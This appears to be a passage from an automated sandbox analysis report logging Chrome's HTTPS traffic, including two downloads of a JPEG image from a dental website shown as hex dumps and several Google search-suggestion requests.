                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:49 UTC824OUTGET /wp-content/uploads/2017/03/smile.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _ga=GA1.3.375164163.1713953611; _gid=GA1.3.666271976.1713953612; _gat_gtag_UA_119979881_1=1; _ga_DF396SG33H=GS1.1.1713953610.1.1.1713953627.0.0.0
                                                                                                                                      2024-04-24 10:13:49 UTC468INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:49 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 91606
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:49 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:49 UTC900INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:50 UTC14994INData Raw: 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 a9 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 00 00 00
                                                                                                                                      Data Ascii: n> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:50 UTC16384INData Raw: 1f e9 c7 fc 28 d0 8a 38 75 fe 52 c7 fa 71 fc 91 79 a6 4c 03 a0 c0 35 18 86 80 60 21 84 30 01 a4 14 00 0c 00 00 00 60 21 80 c5 e6 01 a8 0f c0 04 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 31 00 0c 40 03 10 c4 00 31 00 43 01 0c 00 00 02 80 00 00 00 00 00 00 20 00 00 a0 00 0a 90 00 19 86 a0 00 00 50 00 00 00 00 00 00 00 00 54 40 c0 2a 02 02 06 02 00 01 0c 40 63 e5 46 a9 9c 6b d1 a4 d9 de be aa 8e 2f 2a 34 62 91 9c 68 88 f1 a6 01 53 4c 69 91 18 12 4f a8 c8 8d 00 fc 00 55 00 18 02 0c 80 06 c5 a8 00 c0 41 50 1d 47 81 11 a0 25 50 f8 91 1e 00 31 a1 00 43 cc 17 80 78 8a a0 32 51 d4 88 e2 e8 fc 02 a5 5c 09 4d 3a 57 c0 ae 94 78 93 6f d2 93 25 23 95 c8 9b 97 2a 7d 14 7f 23 dd 7d b9 69 da ed 3c 77 25 8c 96 e7 f1 3c 45 db 5b f9 12 8a 7f 52 a1 ec e1 cd f6 2c da e3 d9
                                                                                                                                      Data Ascii: (8uRqyL5`!0`!01@1C PT@*@cFk/*4bhSLiOUAPG%P1Cx2Q\M:Wxo%#*}#}i<w%<E[R,
                                                                                                                                      2024-04-24 10:13:50 UTC16384INData Raw: cb 2e d6 29 ac fc 4a ac 35 26 9b c1 96 dd 7b 6b 5c 49 3f af fc 95 8d 7d 55 96 7a 1b ad fd 0a 86 2a 6e 75 96 69 e0 6c b5 f4 e0 70 fc 99 fb 33 f5 6f 4f 29 80 01 e1 75 00 20 01 88 04 03 15 40 00 18 80 00 09 11 18 09 95 96 32 b6 00 02 00 24 02 00 a6 02 18 0d 00 80 82 43 22 30 18 c4 80 06 1a 00 01 f4 4e 2f fb 6b 3f dc 8f e4 8b 8a 78 bf ed ac ff 00 72 3f 92 2e 36 cd 34 02 18 43 18 80 29 80 00 0c 00 00 00 00 01 00 0c 00 00 00 00 00 20 00 00 00 00 0a 00 03 cc 00 00 00 40 00 40 00 00 00 86 22 80 00 44 00 00 00 05 40 40 31 00 00 c4 00 01 80 08 00 62 00 00 00 10 00 aa 3a 88 00 03 11 00 c4 00 00 20 00 00 f2 06 20 1d 40 40 03 01 54 00 60 20 01 85 44 20 18 0a a1 50 00 fe 8c 40 c0 18 80 00 2a 26 02 00 23 35 54 30 78 a0 39 5c b8 ea 73 9e a7 5f 95 1a a3 93 71 52 4c 8a 55
                                                                                                                                      Data Ascii: .)J5&{k\I?}Uz*nuilp3oO)u @2$C"0N/k?xr?.64C) @@"D@@1b: @@T` D P@*&#5T0x9\s_qRLU
                                                                                                                                      2024-04-24 10:13:50 UTC16384INData Raw: c5 d4 45 99 6f 4a 56 2f 29 ac 99 a9 2c 37 2f 91 5f 2a 1e e5 96 d6 71 c4 e9 8c b9 e7 0d 50 70 e4 db aa fa b5 15 ad d6 a7 8e 47 2b 8f c9 9d 89 55 65 aa 3a b6 b9 16 b9 0b 3a 4b a3 39 6d ad 8e ba ef 2f dd d1 8a 8c d2 69 1a 22 a3 4e 86 0b 52 70 7e 06 b5 77 15 d0 e7 5d e2 ae 63 db 0a 75 39 ce 2a a6 be 5c b7 4f 6a c9 19 d6 18 b3 bf 5c c6 b3 ea f2 f6 dc ef 7e 8a e7 f5 25 a2 29 7e a9 b7 d0 b6 54 c5 95 45 2c 5b 33 b7 12 fd bf dd 67 36 7d ff 00 d9 39 27 b2 29 6a cf 4f da 13 85 e8 dc 6f d5 1b 7b 61 1d 68 f0 a9 e7 9d 60 e1 2a 65 8a a9 e8 3b 0d 5a 9d d9 62 e7 86 e7 d1 62 70 db c3 af ab ad 77 08 b5 96 f9 52 ac be f2 70 b5 0b 51 74 f4 ad df 3a 99 94 bf 98 e5 2b 58 fa 73 f3 d5 9a ef 4d 4e fa 51 59 2a b5 e0 8e 0d 2b 9e db 36 2b 71 f8 fc 8f 05 de 79 7f cc f2 65 24 ea aa d4
                                                                                                                                      Data Ascii: EoJV/),7/_*qPpG+Ue::K9m/i"NRp~w]cu9*\Oj\~%)~TE,[3g6}9')jOo{ah`*e;ZbbpwRpQt:+XsMNQY*+6+qye$
                                                                                                                                      2024-04-24 10:13:50 UTC16384INData Raw: 4d d6 8f 3a 9c 3b 7d eb 9b 0a 29 b5 71 2e b8 33 65 ae f1 c5 b8 a9 79 4a dc bf 7a 95 5f 81 73 11 d0 cd e2 bf ac 93 92 b7 19 4a 99 22 8b 57 ec de c6 dd d8 cb c2 a8 94 9f ad 45 ca 94 75 97 4a 2c 59 44 dc dd a8 c6 14 f5 6d ab f3 78 b2 17 2f 29 5b 7b be 35 13 bd b9 ef 79 c9 d7 c8 a2 fc a9 17 ad 48 33 35 08 aa 42 4e ad e6 b2 a1 24 d2 8d 24 aa eb 9a d0 8a c6 8b a1 34 d4 71 08 93 70 8c 37 45 d7 1a 11 7c 84 f4 f3 29 79 f4 2c 82 4d 2a c6 a9 67 40 2c 57 2b 93 c0 8c a6 9e 64 5b 87 e8 75 5a ad 4a e5 24 bc c0 27 71 e6 b5 29 9c f3 a8 4a 55 28 9c aa f0 0a 52 75 7e 62 da eb 80 46 2d e4 8b 55 bc 31 20 ad 46 9e 64 d2 6b c8 9e d4 3d 3c 00 49 51 3a 91 63 78 64 45 c9 51 80 9b f9 90 6c 1c 8a db e8 15 26 c8 37 88 aa 3d 00 69 89 b0 c9 62 43 75 58 0e 82 db aa 19 24 04 54 13 f3 13
                                                                                                                                      Data Ascii: M:;})q.3eyJz_sJ"WEuJ,YDmx/)[{5yH35BN$$4qp7E|)y,M*g@,W+d[uZJ$'q)JU(Ru~bF-U1 Fdk=<IQ:cxdEQl&7=ibCuX$T
                                                                                                                                      2024-04-24 10:13:50 UTC10176INData Raw: 0b 69 16 25 40 a5 18 24 48 06 02 18 00 00 00 00 01 57 23 95 c5 e2 43 dd e5 5e 85 8b 7f bf 72 4a 0b e7 26 8f 27 dd ff 00 e4 df b5 fb 6c 67 1b 17 df 3e fc 70 56 f8 ea b1 af fa 92 a4 42 3d 91 c6 ee df 75 7d bf d9 1e ce e5 ce b7 6a ef ff 00 85 3d f7 3f fa 21 56 7c 87 be ff 00 ca 3f 70 77 4d d6 b8 2d 76 de 3b c2 96 5d 6e b5 e3 71 e5 ff 00 b6 87 89 9c e5 72 72 9d c9 39 4e 4e b2 94 9d 5b 6f 56 d9 7e 3e e3 eb dd eb fe 60 e1 db 8c ed 76 2e 2c af dc ca 3c 8e 47 a2 df 9e c5 ea 7f 81 f3 de fb f7 87 7f fb 85 7b 7d c7 94 ff 00 97 ad 57 1a da d9 6a bf dd 59 fc 4e 0d 44 d9 71 03 a8 ab 88 aa 15 28 62 a8 aa 20 1d 45 50 10 0c 40 00 02 c0 00 00 18 08 07 50 10 c0 04 00 00 00 00 00 02 01 88 00 00 00 02 90 00 04 02 18 00 08 62 00 00 62 00 10 01 00 20 00 00 01 14 00 02 a9 04 a2
                                                                                                                                      Data Ascii: i%@$HW#C^rJ&'lg>pVB=u}j=?!V|?pwM-v;]nqrr9NN[oV~>`v.,<G{}WjYNDq(b EP@Pbb


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      80192.168.2.164981891.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:51 UTC537OUTGET /wp-content/uploads/2017/03/smile.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.3.666271976.1713953612; _gat_gtag_UA_119979881_1=1; _ga_DF396SG33H=GS1.1.1713953610.1.1.1713953627.0.0.0; _ga=GA1.1.375164163.1713953611
                                                                                                                                      2024-04-24 10:13:52 UTC468INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:51 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 91606
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:51 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:52 UTC900INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:52 UTC14994INData Raw: 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 a9 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 00 00 00
                                                                                                                                      Data Ascii: n> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:52 UTC16384INData Raw: 1f e9 c7 fc 28 d0 8a 38 75 fe 52 c7 fa 71 fc 91 79 a6 4c 03 a0 c0 35 18 86 80 60 21 84 30 01 a4 14 00 0c 00 00 00 60 21 80 c5 e6 01 a8 0f c0 04 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 31 00 0c 40 03 10 c4 00 31 00 43 01 0c 00 00 02 80 00 00 00 00 00 00 20 00 00 a0 00 0a 90 00 19 86 a0 00 00 50 00 00 00 00 00 00 00 00 54 40 c0 2a 02 02 06 02 00 01 0c 40 63 e5 46 a9 9c 6b d1 a4 d9 de be aa 8e 2f 2a 34 62 91 9c 68 88 f1 a6 01 53 4c 69 91 18 12 4f a8 c8 8d 00 fc 00 55 00 18 02 0c 80 06 c5 a8 00 c0 41 50 1d 47 81 11 a0 25 50 f8 91 1e 00 31 a1 00 43 cc 17 80 78 8a a0 32 51 d4 88 e2 e8 fc 02 a5 5c 09 4d 3a 57 c0 ae 94 78 93 6f d2 93 25 23 95 c8 9b 97 2a 7d 14 7f 23 dd 7d b9 69 da ed 3c 77 25 8c 96 e7 f1 3c 45 db 5b f9 12 8a 7f 52 a1 ec e1 cd f6 2c da e3 d9
                                                                                                                                      Data Ascii: (8uRqyL5`!0`!01@1C PT@*@cFk/*4bhSLiOUAPG%P1Cx2Q\M:Wxo%#*}#}i<w%<E[R,
                                                                                                                                      2024-04-24 10:13:52 UTC16384INData Raw: cb 2e d6 29 ac fc 4a ac 35 26 9b c1 96 dd 7b 6b 5c 49 3f af fc 95 8d 7d 55 96 7a 1b ad fd 0a 86 2a 6e 75 96 69 e0 6c b5 f4 e0 70 fc 99 fb 33 f5 6f 4f 29 80 01 e1 75 00 20 01 88 04 03 15 40 00 18 80 00 09 11 18 09 95 96 32 b6 00 02 00 24 02 00 a6 02 18 0d 00 80 82 43 22 30 18 c4 80 06 1a 00 01 f4 4e 2f fb 6b 3f dc 8f e4 8b 8a 78 bf ed ac ff 00 72 3f 92 2e 36 cd 34 02 18 43 18 80 29 80 00 0c 00 00 00 00 01 00 0c 00 00 00 00 00 20 00 00 00 00 0a 00 03 cc 00 00 00 40 00 40 00 00 00 86 22 80 00 44 00 00 00 05 40 40 31 00 00 c4 00 01 80 08 00 62 00 00 00 10 00 aa 3a 88 00 03 11 00 c4 00 00 20 00 00 f2 06 20 1d 40 40 03 01 54 00 60 20 01 85 44 20 18 0a a1 50 00 fe 8c 40 c0 18 80 00 2a 26 02 00 23 35 54 30 78 a0 39 5c b8 ea 73 9e a7 5f 95 1a a3 93 71 52 4c 8a 55
                                                                                                                                      Data Ascii: .)J5&{k\I?}Uz*nuilp3oO)u @2$C"0N/k?xr?.64C) @@"D@@1b: @@T` D P@*&#5T0x9\s_qRLU
                                                                                                                                      2024-04-24 10:13:52 UTC16384INData Raw: c5 d4 45 99 6f 4a 56 2f 29 ac 99 a9 2c 37 2f 91 5f 2a 1e e5 96 d6 71 c4 e9 8c b9 e7 0d 50 70 e4 db aa fa b5 15 ad d6 a7 8e 47 2b 8f c9 9d 89 55 65 aa 3a b6 b9 16 b9 0b 3a 4b a3 39 6d ad 8e ba ef 2f dd d1 8a 8c d2 69 1a 22 a3 4e 86 0b 52 70 7e 06 b5 77 15 d0 e7 5d e2 ae 63 db 0a 75 39 ce 2a a6 be 5c b7 4f 6a c9 19 d6 18 b3 bf 5c c6 b3 ea f2 f6 dc ef 7e 8a e7 f5 25 a2 29 7e a9 b7 d0 b6 54 c5 95 45 2c 5b 33 b7 12 fd bf dd 67 36 7d ff 00 d9 39 27 b2 29 6a cf 4f da 13 85 e8 dc 6f d5 1b 7b 61 1d 68 f0 a9 e7 9d 60 e1 2a 65 8a a9 e8 3b 0d 5a 9d d9 62 e7 86 e7 d1 62 70 db c3 af ab ad 77 08 b5 96 f9 52 ac be f2 70 b5 0b 51 74 f4 ad df 3a 99 94 bf 98 e5 2b 58 fa 73 f3 d5 9a ef 4d 4e fa 51 59 2a b5 e0 8e 0d 2b 9e db 36 2b 71 f8 fc 8f 05 de 79 7f cc f2 65 24 ea aa d4
                                                                                                                                      Data Ascii: EoJV/),7/_*qPpG+Ue::K9m/i"NRp~w]cu9*\Oj\~%)~TE,[3g6}9')jOo{ah`*e;ZbbpwRpQt:+XsMNQY*+6+qye$
                                                                                                                                      2024-04-24 10:13:52 UTC16384INData Raw: 4d d6 8f 3a 9c 3b 7d eb 9b 0a 29 b5 71 2e b8 33 65 ae f1 c5 b8 a9 79 4a dc bf 7a 95 5f 81 73 11 d0 cd e2 bf ac 93 92 b7 19 4a 99 22 8b 57 ec de c6 dd d8 cb c2 a8 94 9f ad 45 ca 94 75 97 4a 2c 59 44 dc dd a8 c6 14 f5 6d ab f3 78 b2 17 2f 29 5b 7b be 35 13 bd b9 ef 79 c9 d7 c8 a2 fc a9 17 ad 48 33 35 08 aa 42 4e ad e6 b2 a1 24 d2 8d 24 aa eb 9a d0 8a c6 8b a1 34 d4 71 08 93 70 8c 37 45 d7 1a 11 7c 84 f4 f3 29 79 f4 2c 82 4d 2a c6 a9 67 40 2c 57 2b 93 c0 8c a6 9e 64 5b 87 e8 75 5a ad 4a e5 24 bc c0 27 71 e6 b5 29 9c f3 a8 4a 55 28 9c aa f0 0a 52 75 7e 62 da eb 80 46 2d e4 8b 55 bc 31 20 ad 46 9e 64 d2 6b c8 9e d4 3d 3c 00 49 51 3a 91 63 78 64 45 c9 51 80 9b f9 90 6c 1c 8a db e8 15 26 c8 37 88 aa 3d 00 69 89 b0 c9 62 43 75 58 0e 82 db aa 19 24 04 54 13 f3 13
                                                                                                                                      Data Ascii: M:;})q.3eyJz_sJ"WEuJ,YDmx/)[{5yH35BN$$4qp7E|)y,M*g@,W+d[uZJ$'q)JU(Ru~bF-U1 Fdk=<IQ:cxdEQl&7=ibCuX$T
                                                                                                                                      2024-04-24 10:13:52 UTC10176INData Raw: 0b 69 16 25 40 a5 18 24 48 06 02 18 00 00 00 00 01 57 23 95 c5 e2 43 dd e5 5e 85 8b 7f bf 72 4a 0b e7 26 8f 27 dd ff 00 e4 df b5 fb 6c 67 1b 17 df 3e fc 70 56 f8 ea b1 af fa 92 a4 42 3d 91 c6 ee df 75 7d bf d9 1e ce e5 ce b7 6a ef ff 00 85 3d f7 3f fa 21 56 7c 87 be ff 00 ca 3f 70 77 4d d6 b8 2d 76 de 3b c2 96 5d 6e b5 e3 71 e5 ff 00 b6 87 89 9c e5 72 72 9d c9 39 4e 4e b2 94 9d 5b 6f 56 d9 7e 3e e3 eb dd eb fe 60 e1 db 8c ed 76 2e 2c af dc ca 3c 8e 47 a2 df 9e c5 ea 7f 81 f3 de fb f7 87 7f fb 85 7b 7d c7 94 ff 00 97 ad 57 1a da d9 6a bf dd 59 fc 4e 0d 44 d9 71 03 a8 ab 88 aa 15 28 62 a8 aa 20 1d 45 50 10 0c 40 00 02 c0 00 00 18 08 07 50 10 c0 04 00 00 00 00 00 02 01 88 00 00 00 02 90 00 04 02 18 00 08 62 00 00 62 00 10 01 00 20 00 00 01 14 00 02 a9 04 a2
                                                                                                                                      Data Ascii: i%@$HW#C^rJ&'lg>pVB=u}j=?!V|?pwM-v;]nqrr9NN[oV~>`v.,<G{}WjYNDq(b EP@Pbb


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      81192.168.2.1649819142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:52 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      82192.168.2.1649820142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:53 UTC648OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=ht&oit=1&cp=2&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      83192.168.2.1649821142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:53 UTC651OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https&oit=1&cp=5&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      84192.168.2.1649822142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:54 UTC654OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A&oit=4&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
